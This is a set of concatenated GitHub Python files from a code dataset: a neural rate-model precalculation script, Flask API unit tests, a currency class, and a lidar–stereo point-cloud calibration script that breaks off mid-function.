#'peak_imag_r1_sigmamod', 'f_peak_imag_r1_sigmamod'] #not needed\nLN_quantity_names = ['r_ss', 'V_mean_ss', \n 'tau_mu_exp', 'tau_sigma_exp',\n 'tau_mu_dosc', 'f0_mu_dosc']\n #'tau_sigma_dosc', 'f0_sigma_dosc'] #not needed\n #'B_mu_bedosc', 'tau1_mu_bedosc', 'tau2_mu_bedosc', 'f0_mu_bedosc'] #not needed\n\nplot_EIF_output_names = ['r1_mumod', 'ifft_r1_mumod', 'r1_sigmamod', 'ifft_r1_sigmamod'] \nplot_quantitiy_names = ['r_ss', 'V_mean_ss']#,\n #'tau_mu_exp', 'tau_sigma_exp',\n #'tau_mu_dosc', 'f0_mu_dosc']\n #'tau_sigma_dosc', 'f0_sigma_dosc'] #not needed\n #'B_mu_bedosc', 'tau1_mu_bedosc', 'tau2_mu_bedosc', 'f0_mu_bedosc'] #not needed\n\nif __name__ == '__main__':\n\n # LOADING ----------------------------------------------------------------------\n if load_EIF_output:\n cf.load(folder+'/'+output_filename, EIF_output_dict,\n EIF_output_names + ['mu_vals', 'sigma_vals', 'freq_vals'], params)\n # optional shortcuts\n mu_vals = EIF_output_dict['mu_vals']\n sigma_vals = EIF_output_dict['sigma_vals']\n freq_vals = EIF_output_dict['freq_vals'] \n \n if load_quantities:\n cf.load(folder+'/'+quantities_filename, LN_quantities_dict,\n LN_quantity_names + ['mu_vals', 'sigma_vals', 'freq_vals'], params)\n # optional shortcuts\n mu_vals = LN_quantities_dict['mu_vals']\n sigma_vals = LN_quantities_dict['sigma_vals']\n freq_vals = LN_quantities_dict['freq_vals'] \n \n #print params['t_ref'] #TEMP\n \n # COMPUTING --------------------------------------------------------------------\n# if compute_EIF_output: \n# EIF_output_dict = cf.EIF_steadystate_and_linresponse(mu_vals,sigma_vals,params,\n# EIF_output_dict,EIF_output_names)\n# \n# \n# if compute_quantities: \n# LN_quantities_dict = cf.calc_cascade_quantities(mu_vals,sigma_vals,params,\n# EIF_output_dict,LN_quantities_dict,\n# LN_quantity_names)\n# # takes a few minutes (~10 for single proc.)\n \n # NEW: combined EIF_steadystate_and_linresponse and calc_cascade_quantities, \n # calculate all mu_vals per process and opt for not storing rate responses (filters)\n # in order to save memory! \n if compute_EIF_output and compute_quantities:\n EIF_output_dict, LN_quantities_dict = cf.calc_EIF_output_and_cascade_quants(\n mu_vals, sigma_vals, params, \n EIF_output_dict, EIF_output_names, save_rate_mod,\n LN_quantities_dict, LN_quantity_names) \n # takes 40 min. for default mu,sigma,freq grid and N_procs=8 (risha)\n # takes ~125 min. for default mu,sigma,freq grid and N_procs=2 (lenovo laptop)\n # takes 1 h for default mu,sigma,freq grid and N_procs=10 (merope) \n \n # SAVING ----------------------------------------------------------------------- \n if save_EIF_output:\n cf.save(folder+'/'+output_filename, EIF_output_dict, params) \n print('saving EIF output done')\n \n if save_quantities:\n cf.save(folder+'/'+quantities_filename, LN_quantities_dict, params) \n print('saving LN quantities done')\n \n # PLOTTING ---------------------------------------------------------------------\n if plot_filters:\n recalc_filters = True\n cf.plot_filters(EIF_output_dict, LN_quantities_dict, plot_EIF_output_names, \n params, mus_plot, sigmas_plot, recalc_filters)\n \n if plot_quantities: \n # cf.plot_quantities(LN_quantities_dict, plot_quantitiy_names, sigmas_quant_plot)\n cf.plot_quantities_forpaper(LN_quantities_dict, plot_quantitiy_names, \n sigmas_quant_plot, mus_plot, sigmas_plot)\n \n\nplot_addon_fabian = False\nif plot_addon_fabian:\n cf.fig5_addon_Fabian(LN_quantities_dict, plot_quantitiy_names,\n sigmas_quant_plot, mus_plot, sigmas_plot)\n\n","repo_name":"neuromethods/fokker-planck-based-spike-rate-models","sub_path":"adex_comparison/backup_with_extended_functionality/quantities_precalc_linearresponse.py","file_name":"quantities_precalc_linearresponse.py","file_ext":"py","file_size_in_byte":8708,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"37915709191","text":"from app import create_app\nimport unittest\n\n\n\nclass test_character(unittest.TestCase):\n app = create_app(config_name=\"testing\")\n client = app.test_client()\n\n ''' --------------------------------\n Testing the getALL / READ of the API's character\n --------------------------------------'''\n\n def test_getAll_character(self):\n # This formatting is due to JSON on windows ...\n self.client.post('/character', data=\"{\\\"id\\\": 7,\\\"name\\\": \\\"moi\\\",\\\"age\\\": 23,\\\"weight\\\": 75,\\\"human\\\": \"\n \"\\\"True\\\",\\\"hat\\\": 3}\")\n res = self.client.get('/character')\n self.assertEqual(res.status_code, 200)\n\n ''' --------------------------------\n Testing the getOne / READ one of the API's character\n --------------------------------------'''\n\n def test_getOne_character(self):\n self.client.post('/character', data=\"{\\\"id\\\": 7,\\\"name\\\": \\\"moi\\\",\\\"age\\\": 23,\\\"weight\\\": 75,\\\"human\\\": \"\n \"\\\"True\\\",\\\"hat\\\": 3}\")\n res = self.client.get('/oneCharacter', data=\"{\\\"id\\\": 7}\")\n self.assertEqual(res.status_code, 200)\n\n ''' --------------------------------\n Testing the CREATE / POST of the API's character\n --------------------------------------'''\n\n def test_create_character(self):\n self.client.delete('/character', data=\"{\\\"id\\\": 7}\") # delete the character if exists\n res = self.client.post('/character', data=\"{\\\"id\\\": 7,\\\"name\\\": \\\"moi\\\",\\\"age\\\": 23,\\\"weight\\\": 75,\\\"human\\\": \"\n \"\\\"True\\\",\\\"hat\\\": 3}\")\n # check status code\n self.assertEqual(res.status_code, 201)\n # check the data sent with the status code As the order of the elements in the JSON may be different,\n # we only check that the correct id is return in the whole data\n self.assertIn(\"id\\\": 7\", str(res.data))\n\n def test_alreadyExist_create_character(self):\n res = self.client.post('/character', data=\"{\\\"id\\\": 7,\\\"name\\\": \\\"moi\\\",\\\"age\\\": 23,\\\"weight\\\": 75,\\\"human\\\": \"\n \"\\\"True\\\",\\\"hat\\\": 3}\")\n # we send it a second time so the app should respond 'user already exists, 400\"\n res = self.client.post('/character', data=\"{\\\"id\\\": 7,\\\"name\\\": \\\"moi\\\",\\\"age\\\": 23,\\\"weight\\\": 75,\\\"human\\\": \"\n \"\\\"True\\\",\\\"hat\\\": 3}\")\n self.assertEqual(res.status_code, 400)\n\n def test_NoInput_create_character(self):\n res = self.client.post('/character')\n self.assertEqual(res.status_code, 400)\n\n def test_Age_Not_create_character(self):\n self.client.delete('/character', data=\"{\\\"id\\\":7}\")\n res = self.client.post('/character', data=\"{\\\"id\\\": 7,\\\"name\\\": \\\"moi\\\",\\\"age\\\": -5,\\\"weight\\\": 75,\\\"human\\\": \"\n \"\\\"True\\\",\\\"hat\\\": 3}\")\n self.assertIn(\"age is not correct\", str(res.data))\n\n def test_Human_Not_create_character(self):\n self.client.delete('/character', data=\"{\\\"id\\\":7}\")\n res = self.client.post('/character', data=\"{\\\"id\\\": 7,\\\"name\\\": \\\"moi\\\",\\\"age\\\": 23,\\\"weight\\\": 75,\\\"human\\\": \"\n \"\\\"False\\\",\\\"hat\\\": 3}\")\n self.assertEqual(res.status_code, 400)\n self.assertIn(\"can not create the character\", str(res.data))\n\n def testAgeAndWeight_Not_create_character(self):\n self.client.delete('/character', data=\"{\\\"id\\\":7}\")\n res = self.client.post('/character', data=\"{\\\"id\\\": 7,\\\"name\\\": \\\"moi\\\",\\\"age\\\": 8,\\\"weight\\\": 90,\\\"human\\\": \"\n \"\\\"True\\\",\\\"hat\\\": 3}\")\n self.assertEqual(res.status_code, 400)\n self.assertIn(\"weight is too big for age\", str(res.data))\n\n def test_YellowAndP_Not_create_character(self):\n self.client.delete('/character', data=\"{\\\"id\\\":7}\")\n self.client.post('/hat', data=\"{\\\"id\\\": 7,\\\"colour\\\": \\\"YELLOW\\\"}\")\n res = self.client.post('/character', data=\"{\\\"id\\\": 7,\\\"name\\\": \\\"p\\\",\\\"age\\\": 18,\\\"weight\\\": 50,\\\"human\\\": \"\n \"\\\"True\\\",\\\"hat\\\": 7}\")\n self.assertEqual(res.status_code, 400)\n self.assertIn(\"You have a p in your name, can not have a yellow hat\", str(res.data))\n\n ''' --------------------------------\n Testing the DELETE of the API's character\n --------------------------------------'''\n\n def test_delete_character(self):\n\n self.client.post('/character', data=\"{\\\"id\\\": 7,\\\"name\\\": \\\"moi\\\",\\\"age\\\": 23,\\\"weight\\\": 75,\\\"human\\\": \"\n \"\\\"True\\\",\\\"hat\\\": 3}\")\n res = self.client.delete('/character', data=\"{\\\"id\\\":7}\")\n self.assertEqual(res.status_code, 200)\n self.assertIn(\"\\\"User deleted \\\": 7\", str(res.data))\n\n def test_Missing_delete_character(self):\n # First delete of the character, then another one\n self.client.delete('/character', data=\"{\\\"id\\\":7}\")\n res = self.client.delete('/character', data=\"{\\\"id\\\":7}\")\n self.assertEqual(res.status_code, 400)\n\n def test_NoInput_delete_character(self):\n res = self.client.delete('/character')\n self.assertEqual(res.status_code, 400)\n\n ''' --------------------------------\n Testing the update / PUT of the API's character\n --------------------------------------'''\n\n def test_update_character(self):\n res = self.client.put('/character', data=\"{\\\"id\\\":1, \\\"name\\\":\\\"matt\\\"}\")\n self.assertEqual(res.status_code, 201)\n\n def test_NoInput_update_character(self):\n res = self.client.put('/character', data=\"{}\")\n self.assertEqual(res.status_code, 400)\n self.assertIn('No input data provided', str(res.data))\n\n def test_NoExist_update_Character(self):\n self.client.delete('/character', data=\"{\\\"id\\\":7}\")\n res = self.client.put('/character', data=\"{\\\"id\\\":7, \\\"name\\\":\\\"matt\\\"}\")\n self.assertEqual(res.status_code, 400)\n self.assertIn('Character does not exist', str(res.data))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"ouhibyann/Flask_REST-API","sub_path":"tests/test_character.py","file_name":"test_character.py","file_ext":"py","file_size_in_byte":6177,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"38382149643","text":"\nclass Moneda:\n '''Representa un tipo de cambio, con su nombre y valores de compraventa'''\n def __init__(self, id='0', name='?', val_compra=0, val_venta=0) -> None:\n self._id = id\n self._name = name\n self._val_compra = val_compra\n self._val_venta = val_venta\n\n @classmethod\n def from_csv_entry(cls, val:str) -> object:\n '''Construye una instancia de Moneda a partir de valores separados por coma'''\n try:\n id, name, val_compra, val_venta = val.split(',')\n return cls(int(id), name, float(val_compra) ,float(val_venta))\n except ValueError as e:\n raise ValueError('Error al parsear entrada de CSV de moneda: ({})'.format(val.replace(\"\\n\", \"\")))\n\n def as_dict(self) -> dict:\n '''Obtiene una representación en forma de diccionario de la moneda'''\n return {\n 'id':self._id,\n 'value1':self._val_compra,\n 'value2':self._val_venta,\n 'name':self._name,\n }\n\n def serialize_csv(self):\n '''Serializa la moneda en una entrada separada por comas'''\n return f'{self._id},{self._name},{self._val_compra},{self._val_venta}'\n\n def __eq__(self, o: object) -> bool:\n if isinstance(o, Moneda):\n return all((\n self._id == o._id,\n self._name == o._name,\n self._val_compra == o._val_compra,\n self._val_venta == o._val_venta,\n )) \n else:\n super.__eq__(self, o)\n \n\n\n","repo_name":"lorsi96/DASO_TP1","sub_path":"src/currencylib/moneda.py","file_name":"moneda.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41585199976","text":"import argparse\nimport struct\nimport time\n\nimport numpy as np\nimport open3d as o3d\nimport plotly.graph_objs as go\nfrom scipy.spatial import distance\nfrom sklearn.cluster import KMeans\nfrom scipy.spatial.transform import Rotation\nimport os\n\nglobal debug\n\n\ndef main(pcd, pcd_object, threshold, name, threshold_ransac, length, width, height):\n object_isolated = compute_distance(pcd, pcd_object, threshold, name) # remove points appearing in both data\n\n normals_estimated = normal_estimation(object_isolated) # estimate normals\n right, left, top = kmeans(normals_estimated, name) # run kmean on object, returns planes detected\n\n plane_model_a = plane_model_b = plane_model_c = plane_model_r = plane_model_t = plane_model_l = np.empty((0, 4))\n a_in = b_in = c_in = a_out = b_out = c_out = r_in = l_in = t_in = np.empty((0, 3))\n x = []\n plane_name_a = plane_name_b = plane_name_c = ''\n \"\"\"\n Ransac on plane, with 3 randomly chosen start points and 500 iterations\n \"\"\"\n for i in range(100):\n a_in, a_out, plane_model_a_, plane_name_a = ransac(right, threshold_ransac, 3, 1000)\n b_in, b_out, plane_model_b_, plane_name_b = ransac(left, threshold_ransac, 3, 1000)\n c_in, c_out, plane_model_c_, plane_name_c = ransac(top, threshold_ransac, 3, 1000)\n x.append(i)\n plane_model_a = np.append(plane_model_a, plane_model_a_, axis=0)\n plane_model_b = np.append(plane_model_b, plane_model_b_, axis=0)\n plane_model_c = np.append(plane_model_c, plane_model_c_, axis=0)\n\n \"\"\"\n Take mean of 100 ransac iterations\n \"\"\"\n plane_model_a = np.divide(np.sum(plane_model_a, axis=0), len(x))\n plane_model_b = np.divide(np.sum(plane_model_b, axis=0), len(x))\n plane_model_c = np.divide(np.sum(plane_model_c, axis=0), len(x))\n if debug:\n inl1 = getTrace(a_in[:, 0], a_in[:, 1], a_in[:, 2], c=\"green\", s=4, label=f\"{plane_name_a} inliers\")\n inl2 = getTrace(b_in[:, 0], b_in[:, 1], b_in[:, 2], c=\"green\", s=4, label=f\"{plane_name_b} inliers\")\n inl3 = getTrace(c_in[:, 0], c_in[:, 1], c_in[:, 2], c=\"green\", s=4, label=f\"{plane_name_c} inliers\")\n out1 = getTrace(a_out[:, 0], a_out[:, 1], a_out[:, 2], c=\"red\", s=4, label=f\"{plane_name_a} outliers\")\n out2 = getTrace(b_out[:, 0], b_out[:, 1], b_out[:, 2], c=\"red\", s=4, label=f\"{plane_name_b} outliers\")\n out3 = getTrace(c_out[:, 0], c_out[:, 1], c_out[:, 2], c=\"red\", s=4, label=f\"{plane_name_c} outliers\")\n showGraph(f\"RANSAC {name}\",\n \"Z\", \"X\", \"Y\",\n [inl1, inl2, inl3, out1, out2, out3])\n\n \"\"\"\n Planes will be assigned to side\n \"\"\"\n if plane_name_a == \"Top\":\n t_in, t_out, plane_model_t = a_in, a_out, plane_model_a\n elif plane_name_a == \"Left\":\n l_in, l_out, plane_model_l = a_in, a_out, plane_model_a\n elif plane_name_a == \"Right\":\n r_in, r_out, plane_model_r = a_in, a_out, plane_model_a\n if plane_name_b == \"Top\":\n t_in, t_out, plane_model_t = b_in, b_out, plane_model_b\n elif plane_name_b == \"Left\":\n l_in, l_out, plane_model_l = b_in, b_out, plane_model_b\n elif plane_name_b == \"Right\":\n r_in, r_out, plane_model_r = b_in, b_out, plane_model_b\n if plane_name_c == \"Top\":\n t_in, t_out, plane_model_t = c_in, c_out, plane_model_c\n elif plane_name_c == \"Left\":\n l_in, l_out, plane_model_l = c_in, c_out, plane_model_c\n elif plane_name_c == \"Right\":\n r_in, r_out, plane_model_r = c_in, c_out, plane_model_c\n\n inliers = np.concatenate((t_in, l_in, r_in))\n\n if debug:\n print(f\"Plane equation top: {plane_model_t[0]:.2f}x + {plane_model_t[1]:.2f}y \"\n f\"+ {plane_model_t[2]:.2f}z + {plane_model_t[3]:.2f} = 0\")\n print(f\"Plane equation left: {plane_model_l[0]:.2f}x + {plane_model_l[1]:.2f}y \"\n f\"+ {plane_model_l[2]:.2f}z + {plane_model_l[3]:.2f} = 0\")\n print(f\"Plane equation right: {plane_model_r[0]:.2f}x + {plane_model_r[1]:.2f}y \"\n f\"+ {plane_model_r[2]:.2f}z + {plane_model_r[3]:.2f} = 0\")\n\n \"\"\"\n Find intersections line\n \"\"\"\n vektor_rt = plane_intersect(plane_model_r, plane_model_t)\n vektor_lt = plane_intersect(plane_model_l, plane_model_t)\n vektor_rl = plane_intersect(plane_model_r, plane_model_l)\n\n \"\"\"\n Find intersections\n \"\"\"\n \"\"\" Intersection of all 3 planes \"\"\"\n schnittpunkt = finde_intersection(plane_model_r, plane_model_l, plane_model_t, \"Schnittpunkt 1\")\n \"\"\" Intersection down \"\"\"\n schnittpunkt2 = intersection(vektor_rl, height, schnittpunkt)\n \"\"\" Intersection right top \"\"\"\n schnittpunkt3 = intersection(vektor_rt, -width, schnittpunkt)\n \"\"\" Intersection left top \"\"\"\n schnittpunkt4 = intersection(vektor_lt, -length, schnittpunkt)\n \"\"\" Intersection back top \"\"\"\n schnittpunkt5 = intersection(vektor_lt, -length, schnittpunkt3)\n \"\"\" Intersection right down \"\"\"\n schnittpunkt6 = intersection(vektor_rt, -width, schnittpunkt2)\n \"\"\" Intersection left down \"\"\"\n schnittpunkt7 = intersection(vektor_lt, -length, schnittpunkt2)\n s_all = np.concatenate((schnittpunkt, schnittpunkt2, schnittpunkt3, schnittpunkt4, schnittpunkt5, schnittpunkt6,\n schnittpunkt7))\n if debug:\n \"\"\"\n return angle in degrees\n \"\"\"\n find_winkel(vektor_rt, vektor_lt, f\"R + L {name}\")\n find_winkel(vektor_rl, vektor_rt, f\"T + L {name}\")\n find_winkel(vektor_rl, vektor_lt, f\"R + T {name}\")\n\n return s_all, inliers\n\n\n\"\"\"\nDeprecated, only needed if Data is in binary format\n\"\"\"\n\n\ndef convert_kitti_bin_to_pcd(bin, name):\n \"\"\"\n Converts binary data to open3d point cloud\n :param bin: Numpy Array if Data is in binary format\n :param name: name of the data\n :return: open3d point cloud\n \"\"\"\n size_float = 4\n list_pcd = []\n with open(bin, \"rb\") as f:\n byte = f.read(size_float * 4)\n while byte:\n x, y, z, intensity = struct.unpack(\"ffff\", byte)\n # if 4 <= x <= 30 and -5 <= y <= 5: # necessary if pre-cutting is wanted\n list_pcd.append([x, y, z])\n byte = f.read(size_float * 4)\n np_pcd = np.asarray(list_pcd)\n pcd = toPointCloud(np_pcd)\n if debug:\n o3d.visualization.draw_geometries([pcd], height=800, width=800, mesh_show_back_face=False)\n return pcd\n\n\n\"\"\"\nSection 1: Support functions\n\"\"\"\n\n\ndef transform_stereo(ob):\n \"\"\"\n Transformates Stereo data to lidar coordinate systems\n :param ob: open3d point cloud\n :return: open3d point cloud transformed\n \"\"\"\n trans_matrix = np.array([[0., -1., 0.],\n [0., 0., -1.],\n [1., 0., 0.]])\n np_object_isolated = np.array(ob.points)\n object1 = np.matmul(np_object_isolated, trans_matrix)\n object1 = toPointCloud(object1)\n return object1\n\n\ndef toPointCloud(points):\n \"\"\"\n Converts Numpy Array to open3d point cloud\n :param points: numpy array\n :return: open3d point cloud\n \"\"\"\n pointcloud = o3d.geometry.PointCloud()\n pointcloud.points = o3d.utility.Vector3dVector(points)\n return pointcloud\n\n\ndef remove_points_extended(file, cut):\n \"\"\"\n Remove points outside of a defined boundary\n :param file: data in open3d point cloud format\n :param cut: boundarys with x, y, z\n :return: cropped data\n \"\"\"\n point = np.asarray(file.points)\n point_new = point[(point[:, 0] > cut[0]) & (point[:, 0] < cut[1])\n & (point[:, 1] > cut[2]) & (point[:, 1] < cut[3])\n & (point[:, 2] > cut[4]) & (point[:, 2] < cut[5])]\n pcd_new = toPointCloud(point_new)\n return pcd_new\n\n\ndef remove_points(file, i):\n \"\"\"\n Remove points on the y-axle smaller than 0\n :param file: open3d point cloud\n :param i: threshold\n :return: cropped data\n \"\"\"\n point = np.asarray(file.points)\n point_new = point[(point[:, 2] > i)]\n pcd_new = toPointCloud(point_new)\n return pcd_new\n\n\ndef plane_intersect(a, b):\n \"\"\"\n calculate intersection points of planes\n :param a: numpy array, plane 1\n :param b: numpy array, plane 2\n :return: vector of line\n \"\"\"\n a_vec, b_vec = np.array(a[:3]), np.array(b[:3])\n aXb_vec = np.cross(a_vec, b_vec)\n\n return aXb_vec\n\n\ndef find_winkel(plane1, plane2, name):\n \"\"\"\n calculate angle\n :param plane1: numpy array, plane 1\n :param plane2: numpy array, plane 2\n :param name: string, name of plane\n \"\"\"\n plane1 = np.squeeze(np.asarray(plane1))\n plane2 = np.squeeze(np.asarray(plane2))\n nenner = np.dot(plane1[:3], plane2[:3])\n x_modulus = np.sqrt((plane1[:3] * plane1[:3]).sum())\n y_modulus = np.sqrt((plane2[:3] * plane2[:3]).sum())\n cos_angle = nenner / x_modulus / y_modulus\n angle = np.arccos(cos_angle)\n angle2 = angle * 360 / 2 / np.pi\n print(f\"Winkel {name}:\", angle2)\n\n\ndef geteuclideandistance(points_lidar, points_stereo):\n \"\"\"\n Get euclidean distance of intersection points of lidar and stereo data\n :param points_lidar: numpy array, intersection points lidar\n :param points_stereo: numpy array, intersection points stereo\n \"\"\"\n dist = []\n for i in range(len(points_lidar)):\n dist.append(distance.euclidean(points_lidar[i, :], points_stereo[i, :]))\n print(\"Euclidean Distance\", dist)\n\n\ndef test_function(intersection, p1, p2, p3, name):\n \"\"\"\n Tests intersections with all equations if equals 0, if not prints value\n :param intersection: numpy array, intersection\n :param p1: numpy array, plane 1\n :param p2: numpy array, plane 2\n :param p3: numpy array, plane 3\n :param name: name of plane\n \"\"\"\n test1 = (p1[0] * intersection[0]) + (p1[1] * intersection[1]) + (p1[2] * intersection[2]) + p1[3]\n test2 = (p2[0] * intersection[0]) + (p2[1] * intersection[1]) + (p2[2] * intersection[2]) + p2[3]\n test3 = (p3[0] * intersection[0]) + (p3[1] * intersection[1]) + (p3[2] * intersection[2]) + p3[3]\n print(name)\n if test1 != 0 or test1 != 0.2 or test1 != -0.2:\n print(\"Testgleichung Plane 1: \", test1)\n if test2 != 0 or test2 != 0.35 or test2 != -0.35:\n print(\"Testgleichung Plane 2: \", test2)\n if test3 != 0 or test3 != 0.45 or test3 != -0.45:\n print(\"Testgleichung Plane 3: \", test3)\n\n\ndef point_alignments(r, t, datapoints):\n \"\"\"\n Aligns stereo data on lidar data with given rotation and translation\n :param datapoints: numpy array, data of stereo packet\n :param r: numpy array, rotation\n :param t: numpy array, translation\n :return: right side, left side, top side, intersection points, all transformed\n \"\"\"\n points_aligned = np.add(np.dot(datapoints, r.T), t.T)\n return points_aligned\n\n\n\"\"\"\nSection 2: Algorithms\n\"\"\"\n\n\ndef compute_distance(data, data_object, threshold, name):\n \"\"\"\n Computes the distance between two point clouds and removes the points bigger then set threshold.\n In the second step a statistical outlier removal is applied (see next function)\n :param data: open3d point cloud without object\n :param data_object: open3d point cloud with object\n :param threshold: predefined threshold\n :param name: Stereo or Lidar\n :return: exposed object\n \"\"\"\n dists = data_object.compute_point_cloud_distance(data)\n dists = np.asarray(dists)\n ind = np.where(dists > threshold)[0]\n dist_obj = data_object.select_by_index(ind)\n inlier_cloud = statistical_outlier(dist_obj, name)\n return inlier_cloud\n\n\ndef statistical_outlier(cloud, name):\n \"\"\"\n Removes noise based on statistic\n :param cloud: open3d point cloud with object and noise\n :param name: name of the object\n :return: open3d point cloud object with reduced or no noise\n \"\"\"\n cl, ind = cloud.remove_statistical_outlier(nb_neighbors=500, std_ratio=0.01)\n inlier_cloud = cloud.select_by_index(ind)\n if debug:\n display_inlier_outlier(cloud, ind, name)\n return inlier_cloud\n\n\ndef normal_estimation(downpcd):\n \"\"\"\n Estimates normales of point cloud\n :param downpcd: open3d point cloud\n :return: open3d point cloud with normals\n \"\"\"\n downpcd.normals = o3d.utility.Vector3dVector(np.zeros((1, 3)))\n downpcd.estimate_normals(\n search_param=o3d.geometry.KDTreeSearchParamHybrid(radius=0.1, max_nn=50))\n downpcd.orient_normals_towards_camera_location()\n if debug:\n showPointCloud(downpcd, \"Normals\", True)\n return downpcd\n\n\ndef kmeans(pc, name):\n \"\"\"\n Applies k-Means Algorithm to object, with k-means+++\n :param pc: open3d point cloud\n :return: 3 planes: top, left, right as numpy array\n \"\"\"\n normals = np.asarray(pc.normals)\n points = np.asarray(pc.points)\n kmeans = KMeans(n_clusters=3, init='k-means++', max_iter=1000, n_init=10)\n\n y_kmeans = kmeans.fit_predict(normals)\n # visualising the clusters\n if debug:\n centroids = getTrace(kmeans.cluster_centers_[:, 0], kmeans.cluster_centers_[:, 1],\n kmeans.cluster_centers_[:, 2],\n s=8, c='yellow', label='Centroids')\n\n t1 = getTrace(points[y_kmeans == 0, 0], points[y_kmeans == 0, 1], points[y_kmeans == 0, 2], s=4, c='red',\n label='Top') # match with red=1 initial class\n t2 = getTrace(points[y_kmeans == 1, 0], points[y_kmeans == 1, 1], points[y_kmeans == 1, 2], s=4, c='green',\n label='Left') # match with green=3 initial class\n t3 = getTrace(points[y_kmeans == 2, 0], points[y_kmeans == 2, 1], points[y_kmeans == 2, 2], s=4, c='blue',\n label='Right') # match with blue=2 initial class\n\n showGraph(\n f\"k-Means {name}\",\n \"Z\", \"X\", \"Y\",\n [t1, t2, t3]) # , centroids])\n\n top_p = np.stack((points[y_kmeans == 0, 0], points[y_kmeans == 0, 1], points[y_kmeans == 0, 2]), axis=1)\n left_p = np.stack((points[y_kmeans == 1, 0], points[y_kmeans == 1, 1], points[y_kmeans == 1, 2]), axis=1)\n right_p = np.stack((points[y_kmeans == 2, 0], points[y_kmeans == 2, 1], points[y_kmeans == 2, 2]), axis=1)\n\n right_pc = toPointCloud(right_p)\n left_pc = toPointCloud(left_p)\n top_pc = toPointCloud(top_p)\n return right_pc, left_pc, top_pc\n\n\ndef ransac(plane, threshold, n, i):\n \"\"\"\n Computes plane equation with ransac algorithm and gets side of given plane (top, right, left)\n :param plane: open3d point cloud\n :param threshold: threshold for plane\n :param n: number of start points\n :param i: number of iterations\n :return: inliers (numpy array), outliers (numpy array), plane equation (numpy array), name\n \"\"\"\n plane_model, inliers = plane.segment_plane(distance_threshold=threshold,\n ransac_n=n,\n num_iterations=i)\n [a, b, c, d] = plane_model\n name, [a, b, c, d] = equation(a, b, c, d)\n inlier_cloud = plane.select_by_index(inliers)\n outlier_cloud = plane.select_by_index(inliers, invert=True)\n inlier_cloud = np.asarray(inlier_cloud.points)\n outlier_cloud = np.asarray(outlier_cloud.points)\n\n return inlier_cloud, outlier_cloud, np.array([[a, b, c, d]]), name\n\n\ndef icp(l_all, s_all):\n \"\"\"\n Iterative closest point algorithm to find convergence between lidar and stereo data\n :param l_all: numpy array, intersection points lidar\n :param s_all: numpy array, intersection points stereo\n :return: rotation and translation matrices\n \"\"\"\n mass_center_l = np.divide(np.sum(l_all, axis=0), len(l_all))\n mass_center_s = np.divide(np.sum(s_all, axis=0), len(l_all))\n q = np.subtract(l_all, mass_center_l)\n p = np.subtract(s_all, mass_center_s)\n q = q.T\n p = p.T\n w = np.dot(q, p.T)\n u_l, s_l, vh_l = np.linalg.svd(w)\n r = np.dot(u_l, vh_l)\n t = np.subtract(mass_center_l, np.dot(r, mass_center_s))\n print(\"r_matrix\", r)\n print(\"r_quat\", Rotation.from_matrix(r).as_quat())\n print(\"t\", t)\n return r, t\n\n\ndef intersection(equation, cm, intersect):\n \"\"\"\n Find other intersection based on dimensions of object\n :param equation: numpy array, vector of intersection line\n :param cm: float, dimension of object in cm\n :param intersect: numpy array, start intersection\n :return: numpy array, calculated intersection point\n \"\"\"\n a = np.multiply(equation, cm)\n s = np.subtract(intersect.reshape(-1, 3), a)\n s_shape = np.array(s)\n return s_shape\n\n\ndef equation(plane_x, plane_y, plane_z, plane_):\n \"\"\"\n Gets side of given plane\n :param plane_x: numpy array, x-value of plane equation\n :param plane_y: numpy array, y-value of plane equation\n :param plane_z: numpy array, z-value of plane equation\n :return: plane name as string\n \"\"\"\n plane_name = \"\"\n while plane_name == \"\":\n if plane_x > 0 and plane_y > 0 and plane_z > 0:\n plane_name = \"Right\"\n break\n elif plane_x < 0 and plane_z > 0:\n plane_name = \"Top\"\n break\n elif plane_x < 0 and plane_z < 0:\n plane_name = \"Left\"\n break\n else:\n plane_x = plane_x * -1\n plane_y = plane_y * -1\n plane_z = plane_z * -1\n plane_ = plane_ * -1\n return plane_name, [plane_x, plane_y, plane_z, plane_]\n\n\ndef finde_intersection(plane1, plane2, plane3, name):\n \"\"\"\n Finds intersection points and test them against equations\n :param plane1: numpy array, first plane\n :param plane2: numpy array, second plane\n :param plane3: numpy array, third plane\n :param name: string, name of the plane\n :return: numpy array with intersection\n \"\"\"\n left_side = [plane1[:3]] + [plane2[:3]] + [plane3[:3]]\n right_side = [[-plane1[3]]] + [[-plane2[3]]] + [[-plane3[3]]]\n i_p = np.linalg.solve(left_side, right_side)\n if debug:\n test_function(i_p, plane1, plane2, plane3, name)\n ip = np.array(i_p.reshape(-1, 3))\n return ip\n\n\n\"\"\"\nSection 3: Plot functions\n\"\"\"\n\n\ndef display_inlier_outlier(cloud, ind, string):\n \"\"\"\n Shows points point cloud with outlier points (red) and inlier points (grey) after statistical outlier removal\n :param cloud: open3d point cloud object\n :param ind: index if outlier or inlier\n :param string: name of object\n \"\"\"\n inlier_cloud = cloud.select_by_index(ind)\n outlier_cloud = cloud.select_by_index(ind, invert=True)\n print(\"Showing outliers (red) and inliers (gray): \")\n outlier_cloud.paint_uniform_color([1, 0, 0])\n inlier_cloud.paint_uniform_color([0.8, 0.8, 0.8])\n o3d.visualization.draw_geometries([inlier_cloud, outlier_cloud],\n window_name=string, height=800, width=800, mesh_show_back_face=False)\n\n\ndef getTrace(x, y, z, c, label, s=2):\n \"\"\"\n Prepares data for plotting in plotly, accepts points in 3D-Coordinatesystem\n :param x: x-value in numpy array\n :param y: y-value in numpy array\n :param z: z-value in numpy array\n :param c: color of points\n :param label: label of points\n :param s: size of points\n :return: plotly trace points\n \"\"\"\n trace_points = go.Scatter3d(\n x=x, y=y, z=z,\n mode='markers',\n marker=dict(size=s, line=dict(color='rgb(0, 0, 0)', width=0.5), color=c, opacity=1),\n name=label\n )\n return trace_points\n\n\ndef getMesh(x, y, z, c, label, v, s=4):\n \"\"\"\n Prepares data for plotting in plotly, draws lines\n :param x: numpy array, x-value\n :param y: numpy array, y-value\n :param z: numpy array, z-value\n :param c: string, color of points\n :param label: string, label of points\n :param s: int, size of points\n :param v: string, visibility, set to only appear on legend\n :return: plotly line mesh\n \"\"\"\n surface_points = go.Scatter3d(\n x=x, y=y, z=z,\n mode='lines',\n marker=dict(size=s, 